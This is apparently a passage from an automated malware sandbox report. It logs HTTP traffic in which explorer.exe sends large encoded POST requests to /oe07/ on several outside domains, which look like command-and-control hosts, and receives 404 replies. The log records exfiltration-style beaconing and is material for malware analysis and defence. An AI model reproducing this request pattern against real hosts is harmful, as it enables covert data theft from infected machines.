69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              16192.168.11.2049802154.83.27.10280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:08:00.161756992 CEST989OUTPOST /oe07/ HTTP/1.1
                                                                                                              Host: www.www55275.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 245786
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.www55275.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.www55275.com/oe07/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 30 48 51 4c 39 36 32 38 3d 79 59 28 33 6f 67 38 71 6b 74 54 46 48 33 78 44 52 33 44 5f 30 6b 6b 4d 76 75 74 31 59 45 39 68 70 5f 62 5f 75 79 79 44 68 30 37 38 52 33 51 61 36 47 36 42 31 72 76 68 49 31 51 44 52 7a 7a 39 30 67 44 4a 65 79 32 62 41 41 28 4e 4f 71 79 52 78 35 41 54 52 47 68 4e 4c 4c 46 39 74 77 65 77 59 71 36 6e 34 54 48 59 45 39 4f 76 5a 7a 34 6f 41 78 73 41 36 4a 46 35 59 39 68 6e 43 6b 77 66 71 48 34 49 79 33 6d 6f 4b 71 31 58 37 4c 31 2d 55 64 34 5f 63 72 6d 6b 4c 44 6c 41 39 6f 5a 50 4b 53 43 54 71 38 53 55 28 48 35 79 42 69 49 49 6d 70 42 5f 51 2d 73 57 61 4c 33 61 6e 39 35 7a 44 77 75 4c 77 6f 4c 67 6b 66 35 4b 73 68 57 50 48 58 56 38 39 66 33 62 37 44 37 75 75 37 63 61 4b 63 32 6e 31 6e 72 4c 7e 47 43 63 79 68 78 6b 7a 4a 7e 71 78 62 6c 67 78 70 4c 36 45 79 32 68 51 56 77 51 45 6a 72 4f 38 72 4a 73 63 4e 48 77 6a 74 62 4e 61 76 62 69 49 45 37 45 69 77 44 4d 47 5a 4d 39 6d 63 7a 57 36 48 37 74 47 6b 38 38 47 51 75 66 37 47 48 6f 72 4e 4e 43 76 45 75 67 6e 73 56 31 73 53 61 36 72 54 73 6d 72 63 4c 6e 43 5f 50 45 42 4a 59 53 57 65 44 6d 62 50 64 2d 36 50 38 38 7a 7a 6c 49 4c 53 59 46 35 70 31 66 67 7a 74 6d 64 34 49 65 39 51 58 67 61 66 35 66 7a 6e 46 4d 37 34 28 4f 4d 6a 36 61 31 78 4b 45 79 66 78 78 7e 34 37 37 72 61 4f 50 48 79 62 73 32 67 4c 4e 51 59 28 63 64 76 33 41 46 54 68 5a 65 63 77 4e 67 2d 59 72 38 4b 77 6f 59 77 75 4b 48 37 44 45 47 34 42 70 66 4a 67 78 63 61 6b 46 48 59 4c 4d 53 36 72 4d 58 4a 46 70 50 57 37 43 65 6e 41 47 51 54 51 61 6c 36 42 45 6b 7a 53 5f 53 6d 31 35 4e 4d 4a 62 6a 4d 4e 79 72 48 56 68 55 4e 76 4a 49 77 31 75 4c 2d 48 34 6b 70 45 36 53 57 68 42 43 42 4f 56 63 71 66 56 6f 39 57 5f 48 7a 31 63 47 6c 6d 6a 39 35 6a 71 31 68 48 79 6b 56 30 6a 38 64 5a 4d 62 4d 56 74 35 64 4d 79 66 67 74 7a 38 30 63 6e 70 33 4a 74 6e 50 28 4c 7a 74 6a 69 48 5f 42 4a 54 61 48 34 52 77 76 34 79 31 61 41 46 71 65 64 6d 6a 4a 41 4a 49 37 61 48 35 46 47 58 78 68 35 72 38 35 50 63 6d 28 54 57 57 69 43 78 6a 75 71 36 30 79 76 5a 68 33 35 64 47 35 71 61 30 58 45 4d 70 4e 6c 70 68 68 7a 53 52 70 7a 74 4a 31 74 42 6e 7a 6d 7e 37 34 2d 30 67 5a 79 66 6a 7e 39 66 67 34 65 47 52 57 4f 7e 79 44 63 46 49 67 43 38 5a 53 71 64 57 63 70 6d 72 52 72 41 7a 73 61 69 5a 4f 55 6b 42 61 32 75 6d 28 77 32 56 46 5a 6e 61 79 43 4f 4b 74 59 35 6a 4b 43 52 64 77 74 4e 4f 37 45 31 31 47 6a 68 73 55 69 6d 69 72 4d 76 54 5a 58 71 4a 4c 35 72 62 78 5a 28 48 54 65 69 41 28 6a 65 4e 6d 33 78 4f 47 76 61 68 7a 30 72 65 5a 50 79 72 38 61 66 55 6b 4f 52 6f 4d 75 57 4f 37 59 62 6e 39 6c 28 51 6e 43 79 43 37 44 4f 52 31 48 42 73 6e 64 77 69 4d 6a 4b 44 44 64 59 6f 46 36 7e 7a 77 54 35 66 51 78 67 68 78 5f 57 7a 62 76 35 47 50 5f 48 53 76 4b 4c 48 61 51 52 31 41 4a 48 4f 36 73 63 58 42 62 78 49 7a 4e 78 55 43 61 32 42 4d 75 77 45 47 54 76 42 6d 72 57 57 71 35 77 2d 48 7a 66 61 66 37 6a 47 6b 78 59 39 69 72 63 52 55 30 65 76 5a 78 7e 5a 47 47 50 6c 37 79 50 42 71 46 54 52 6d 76 45 76 39 34 43 74 36 4c 62 30 4b 4f 61 49 71 74 62 6a 75 35 36 57 33 6f 72 78 67 44 5a 62 39 65 5a 2d 43 50 54 6a 6e 78 57 49 42 6d 6d 6d 75 32 59 43 37 65 35 4f 67 45 75 67 77 6b 31 53 51 73 79 67 4e 4d 7e 30 6f 6a 61 50 33 45 46 54 37 45 77 42 73 77 44 49 4c 50 63 7a 67 59 46 79 78 4f 78 4e 51 71 36 47 37 34 4c 6a 69 75 54 75 47 51 35 42 7e 4e 28 6e 64 53 30 47 79 76 6a 56 39 6b 38 63 58 4c 31 68 54 5f 43 67 41 4f 72 6c 65 4d 31 78 51 72 34 2d 42 33 6f 65 61 55 77 44 50 53 79 67 66 35 33 66 32 5a 4f 75 66 35 67 74 70 76 45 69 61 47 6e 46 4e 71 28 31 38 6c 67 36 44 44 35 6e 36 45 35 69 4a 56 31 51 28 56 5a 4e 6f 47 53 73 51 43 47 4f 62 77 76 43 47 43 6c 37 78 49 4a 6e 68 38 48 58 28 6d 42 52 4d 6a 47 47 37 66 58 31 71 31 56 37 79 49 45 38 6a 78 58 62 50 47 4f 47 35 64 49 65 37 69 51 35 32 43 4c 54 65 55 4a 73 4f 6b 4d 4f 75 6a 32 5a 70 64 50 6a 32 61 77 54 4c 33 73 4b 6d 67 68 49 56 51 4c 42 55 64 4f 4d 38 55 37 42 62 4a 52 72 30 6a 37 2d 7e 59 59 50 76 32 70 5f 74 6b 57 68 78 4b 4d 44 47 7a 64 52 57 31 61 44 50 4b 43 51 49 68 63 30 33 50 69 54 54 43 57 44 47 73 4b 63 48 78 4f 76 46 2d 28 50 65 50 32 70 32 59 63 41 62 50 46 74 73 59 59 64 6d 4e 48 73
                                                                                                              Data Ascii: 0HQL9628=yY(3og8qktTFH3xDR3D_0kkMvut1YE9hp_b_uyyDh078R3Qa6G6B1rvhI1QDRzz90gDJey2bAA(NOqyRx5ATRGhNLLF9twewYq6n4THYE9OvZz4oAxsA6JF5Y9hnCkwfqH4Iy3moKq1X7L1-Ud4_crmkLDlA9oZPKSCTq8SU(H5yBiIImpB_Q-sWaL3an95zDwuLwoLgkf5KshWPHXV89f3b7D7uu7caKc2n1nrL~GCcyhxkzJ~qxblgxpL6Ey2hQVwQEjrO8rJscNHwjtbNavbiIE7EiwDMGZM9mczW6H7tGk88GQuf7GHorNNCvEugnsV1sSa6rTsmrcLnC_PEBJYSWeDmbPd-6P88zzlILSYF5p1fgztmd4Ie9QXgaf5fznFM74(OMj6a1xKEyfxx~477raOPHybs2gLNQY(cdv3AFThZecwNg-Yr8KwoYwuKH7DEG4BpfJgxcakFHYLMS6rMXJFpPW7CenAGQTQal6BEkzS_Sm15NMJbjMNyrHVhUNvJIw1uL-H4kpE6SWhBCBOVcqfVo9W_Hz1cGlmj95jq1hHykV0j8dZMbMVt5dMyfgtz80cnp3JtnP(LztjiH_BJTaH4Rwv4y1aAFqedmjJAJI7aH5FGXxh5r85Pcm(TWWiCxjuq60yvZh35dG5qa0XEMpNlphhzSRpztJ1tBnzm~74-0gZyfj~9fg4eGRWO~yDcFIgC8ZSqdWcpmrRrAzsaiZOUkBa2um(w2VFZnayCOKtY5jKCRdwtNO7E11GjhsUimirMvTZXqJL5rbxZ(HTeiA(jeNm3xOGvahz0reZPyr8afUkORoMuWO7Ybn9l(QnCyC7DOR1HBsndwiMjKDDdYoF6~zwT5fQxghx_Wzbv5GP_HSvKLHaQR1AJHO6scXBbxIzNxUCa2BMuwEGTvBmrWWq5w-Hzfaf7jGkxY9ircRU0evZx~ZGGPl7yPBqFTRmvEv94Ct6Lb0KOaIqtbju56W3orxgDZb9eZ-CPTjnxWIBmmmu2YC7e5OgEugwk1SQsygNM~0ojaP3EFT7EwBswDILPczgYFyxOxNQq6G74LjiuTuGQ5B~N(ndS0GyvjV9k8cXL1hT_CgAOrleM1xQr4-B3oeaUwDPSygf53f2ZOuf5gtpvEiaGnFNq(18lg6DD5n6E5iJV1Q(VZNoGSsQCGObwvCGCl7xIJnh8HX(mBRMjGG7fX1q1V7yIE8jxXbPGOG5dIe7iQ52CLTeUJsOkMOuj2ZpdPj2awTL3sKmghIVQLBUdOM8U7BbJRr0j7-~YYPv2p_tkWhxKMDGzdRW1aDPKCQIhc03PiTTCWDGsKcHxOvF-(PeP2p2YcAbPFtsYYdmNHsYzRknoEFO8lbjeV0obeP6ypcm3u7NLd7DXd55TUNjvBuC7YR(lKcJIa5eA62CVTkB5yB02v1N1Ukf6K_d57kV-Rz44hHDn0_i6l0WumvPqc3gYR6y3pLJUDLaipomDJtpvH1ofVYXB8geO22cWtALxYqQa(tgqG4dw2bvK~n8MLXPKUsNk7w8JTbgsDx7e8aCH4ECyxSUIswNl6JgvwI(-iAeqty4Fom33~xu-QCIDbxNKpp03wX7zZE~fMUuZ4GL7xU3-kOIBP95e9QBYgeIq4-KC7H(YHO3HqiQ85xPzH2ygRs3R344M1skE88i39w8pA12H25itIORVHqxPkY0swS8JzcrGNcwa2nqC6xOhtss909rd68eZcOWgmjlcaSfKIljRAvxrAqcdCHVwpxXhcql3fFwtjakSoDofUH68xro2MSgmzbsGqahFDv1ITIrSVzAlBlwJQZkF7ieeRaTAo6B6JkMxhh0I48cDNH3wEUYxQIYioLJEkYPco1hLCFYikM2fdhULzQaKIq2Rss2OA-TPEdKPc5RHjMWpey09rC7g~nSvwPFBFkUP6KuFeLEm0dqvHbs6FHOjyf0I4H5xZ-JX852lnsl8WIMBKRDcdog10w9uDrDUESN9y6hq21EYkOpwpOS2rAgd4VBnJWeR2FwKBgp9p94JoBLtX8TXT6c6U-YplEgbV6plAMPkiTRZUCkeOrS2dSirhNTnS7M1DUKRXkjdS5JbbzZRbvpZMNCOD3ESamD2uiyw72ONP7ys33aEaAU73H4XqR5SsH9XwTg-SMPUjnnat0ksiEco7LXutoVuagLxgW4RmpdhCMdgcjUhTAkj9I3lm-QXifGo2w5som0t7jS2FYjprXpCgABL2kW1bVkBWt(sB_3NDSHxl0tQaG63GTR7yj1f5s(6I4WbMmfTiheoWoHyo2LrEVJKXlnV8EwbvXhvutWQYVi2(znmHDdOMiQikdAViBoXJ4q5rwV8fKeZ8A22u5tLN94aSyDl5uplTa2oSeUeFwp-vcCH(iYIKV4psg8tVG6jjhY_9RWWuWiVmtaJ4vAJ0-pvCP2d3mmeRFgCXrTKhle64tqXRcR-nbbqU_aZiIIVghDTqbbSmc39SwhaH2TnelHeQEQcLpHTEX(37AHsLYv6yIVaC_BgDedrlzxK7PK0tHKLS21fR8i_9s~PP4IAYT6QrufOsdZMGgcmvxVmfgnNKe(aFw88RFkJ4LeG~ILCzdKckX4ajV4X4ixbnoStsKdt~OuNj720Rdy9jTUScM~R5EKOBm6YNdqxnLDyFIgs3S7lRk(uSMxhTQOzPzsFyAqf00exCB9SAbzcqOOWrg6H7UGLMLVSUSj0I3ydwmscntcppsdUIQC3CluJHN4wyt0Vczm55VC_cmlmV03tBDfw3IUmbrj5Z5JrjM5QKEnp7pGEf1KE~HbBC9fVv5nJ1fJaWzqJXB81F9iMNMN6CYDgSJEDi7iTVIFQVyMmhGiNrUFL9LwwjIYe3T341x2V1rXT6LqMHj1AqWy6ry0xP2XbVUK5JBowoS~f9OB-Hxep45IOn-(idoE2xWR6adf7qtqBb7WErBX1t8XQnivu4pLs~IkVxtYrQSUTj6qzfWdQZnbDCg1iDfTV6f~sA8sS78MInuKvfxw7xQIFf16s(0NhcDRiTJM-XzTdz5~FAQLzTrogb6d7ArNAPI33rdcWzcN7ZHYydzYplafiobNS1xIcZGvUbQSZiboAFr03JrG6tzUKDy8kwzss4pryw408H2BLRjVZ3h~QoeIqafctu9X0bfTjz5fl80BBZbJ1701AuaycKWLyhO9_RuTiGPHxaAAKkEGma3V-6ILGGbU7rGJsCx~jBYGpMo2YBFf66nGwfaKo9lQvpjKgOB7KTTXkflS19yykniorrXuyOpuDay68CCpAe1QwEPf6u3t-hYEHvcOMlIlm3f3rfGkvbG2p~JY5nAlZXrrCDF4s5iszkuhY39YvxxM6UWLddFcHZ3pQ8TV_zruWQjgslgPhR4Ou5gFoHa6qvTQrx3QG~1y2oLZ9gp0WQ6MFeKrzCmA-Dt53TA~yz38wCuXPCrgF623kHOSy2aZ7VdWclIqOeYMU6NtI86xvnQXH52YREXzS7wX8vkx3iqq51nvdEHFIvRjTS0DPwuqjKKiEd88opVDHOzTnBO9xaRGhbPE77EIgmr4h37aosPaUgNYvyh70L-dKRNB8kFvsdxfEDa4-Aa4pqZpwcMAdhpG0dYI40JupjlNQgWsBVlbh4azmq09vUoAZXHu7qt91j8O1kQxIoT9jELZj1HnDgbTt8wsey4odi_Dy1zdgQMCnjfQXlcFyOKxZtYs3YdB1fgwGbuNT2UAn3YLc2A~cD_fdL76-6mRk8WHmZtU8txnONtCixmgWrgR2TAtcWHQE88oZGyaSzkCf8e~pH6axi6GnYKhOVcJTe7lU8i9erBdQS8beDpPAmCIItOc0MbabZ-P9wtOP5x7y~-x-oF5WtYN-6BcYjEFgrDkSDpmfY1vrJRuvymAU3J3H~oLGd5kRPPTKpK1JLWn4G9oZtf2y9R6dY5(MC6qXwykwS6QbqYYMAROmoRv_6jbVkmpMl5jyj6yr3gDgfr3SJPIovP~TF94YxonK0Q1hqAc1ezALwpsVkw(9yxkWn34PcVua14gDaSNqSD~RyCTrPx~oWXRz4pMy73bkaGe3uokQ2ab5bxDUhA58b
                                                                                                              Aug 22, 2022 20:08:00.318543911 CEST997OUTData Raw: 66 78 63 57 30 53 6f 5a 34 37 7a 73 77 5f 5a 69 71 39 57 4b 57 74 5a 38 59 6b 36 52 56 39 79 51 52 73 28 34 5a 68 4c 44 53 6a 46 41 62 46 63 50 62 4b 50 55 38 49 69 59 65 68 34 58 55 54 52 39 37 34 33 79 41 44 4b 65 4a 6c 28 6f 35 66 33 71 30 4c
                                                                                                              Data Ascii: fxcW0SoZ47zsw_Ziq9WKWtZ8Yk6RV9yQRs(4ZhLDSjFAbFcPbKPU8IiYeh4XUTR9743yADKeJl(o5f3q0LKuHsY5Gj1WcGEKy-JL(Xl6a1TLj0vOlIfR4LhT2aUBwuJ0~4aeNp2_vtGSmoE8wz4OGB728f9GY5hVncr4KwYdXx7lkutBdrR2jwpf9pu7QW5ASebdZzOU4jaWxZVd5vik~NISLdUrnQ24(fBOykfr8sgCdiSY8MW
                                                                                                              Aug 22, 2022 20:08:00.318594933 CEST998INHTTP/1.1 404 Not Found
                                                                                                              Content-Type: text/html
                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                              Date: Mon, 22 Aug 2022 18:06:30 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 1163
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>
                                                                                                              Aug 22, 2022 20:08:00.318674088 CEST1011OUTData Raw: 72 61 4b 50 59 63 4d 55 33 39 41 65 4f 37 77 44 42 38 41 4f 71 65 7a 7a 54 37 5a 31 48 4c 35 65 59 66 32 38 50 57 61 38 67 59 6d 5a 73 4e 6a 5f 77 4f 54 57 52 6b 66 5f 51 4e 35 76 72 68 4a 4c 59 53 52 76 79 6f 59 76 62 69 53 77 4a 38 45 43 43 31
                                                                                                              Data Ascii: raKPYcMU39AeO7wDB8AOqezzT7Z1HL5eYf28PWa8gYmZsNj_wOTWRkf_QN5vrhJLYSRvyoYvbiSwJ8ECC1Ld~GtTNPBfKczmQuCEicraBe(LZvzSI6Nw(Hk42m3iNrASMtvN2Fe4ymXY47Tk4M2utBEXcxPzXAdDesTFRRfSVXfKl3p1jjRFoWr-~E1MTlv3eh9MS6(3poEiXo56C4(kBH4W(_t-DsWPEY8RmyL5F6LfJ7QFJOI


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              2192.168.11.2049783166.88.142.6380C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Aug 22, 2022 20:04:09.948226929 CEST271OUTPOST /oe07/ HTTP/1.1
                                                                                                              Host: www.meizhuangs.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 245786
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.meizhuangs.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.meizhuangs.com/oe07/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 30 48 51 4c 39 36 32 38 3d 64 6a 4f 65 59 77 39 7a 37 65 35 4d 62 39 38 74 6f 4d 55 38 31 36 61 45 46 71 58 66 48 7a 4e 71 37 76 39 55 39 38 68 5f 77 5a 61 4b 37 57 75 6d 68 78 4f 66 6d 49 57 52 72 63 36 41 61 45 68 35 69 71 4f 6a 6b 57 6f 57 78 36 6c 2d 6a 5a 61 48 57 35 33 53 30 37 6a 77 7a 37 6e 4b 36 61 4d 39 61 38 54 4c 4b 4a 74 58 55 49 46 4a 6d 55 57 6f 30 36 33 43 66 75 48 77 58 52 5a 35 42 62 37 70 38 45 6b 72 49 67 51 73 32 51 54 31 72 54 4f 45 79 6a 73 35 50 33 6c 69 73 66 75 6d 69 46 78 55 62 58 64 65 42 79 6a 55 6b 64 41 61 34 47 4d 55 66 45 51 59 58 46 52 4c 45 72 43 44 35 2d 4a 36 38 51 71 72 61 75 74 5f 4d 34 31 56 36 54 74 64 35 78 72 69 57 4f 34 53 73 70 74 44 45 52 68 2d 74 42 59 62 6e 4e 6f 54 53 35 33 58 38 67 53 66 71 5a 70 56 67 5f 44 45 61 6e 66 52 46 74 7a 30 57 37 54 59 73 38 4b 6e 6c 79 64 51 39 34 47 71 45 58 7e 53 74 50 62 34 48 71 62 32 78 6d 7a 6a 6a 4d 28 4b 36 30 78 65 7a 30 48 31 52 44 69 74 73 69 5a 39 74 78 37 55 52 5a 75 5f 28 65 38 4d 6c 64 73 46 42 4f 63 4e 52 7a 41 68 4c 5a 73 2d 47 38 6b 53 57 64 57 57 6d 57 46 4b 57 58 32 54 46 2d 35 47 6c 4f 55 33 4f 73 28 38 7a 42 34 4e 48 4a 64 79 77 51 62 38 79 79 6c 5f 73 71 75 41 71 34 53 53 64 56 53 4f 6a 44 4d 46 28 33 4d 42 70 6b 41 71 4e 6d 73 31 75 61 42 67 4a 75 43 6a 56 5f 38 30 5a 47 32 45 46 49 57 63 39 49 69 67 34 51 30 46 6f 51 42 6e 48 52 39 67 38 70 4d 45 57 5a 47 2d 4c 33 48 58 56 65 77 63 5a 4d 54 4c 72 38 7a 54 42 67 4e 36 6f 7a 4d 63 78 66 69 6f 74 58 71 2d 4f 39 28 63 32 63 67 71 56 37 69 5a 63 49 61 45 6f 42 61 59 33 52 69 50 59 67 4d 33 73 6c 36 43 78 6a 73 70 73 34 7a 68 4b 64 75 52 77 56 67 42 32 38 67 57 50 69 75 4e 32 4d 58 4e 75 68 5a 59 6e 47 65 77 5a 58 6f 61 4f 39 50 51 51 71 4e 77 67 6d 6c 76 6c 4c 4f 35 6b 34 44 71 75 79 54 66 6a 77 30 4d 71 6b 49 5f 57 32 4e 78 54 47 59 67 75 73 74 67 52 74 65 61 6d 74 79 4f 33 6f 5a 52 42 45 58 6e 50 34 39 6b 6e 30 6f 62 48 79 58 45 75 56 75 64 52 71 6b 61 6d 5f 58 2d 32 73 57 6d 55 51 50 61 35 44 35 78 74 54 4b 50 69 64 41 33 5a 6a 74 79 79 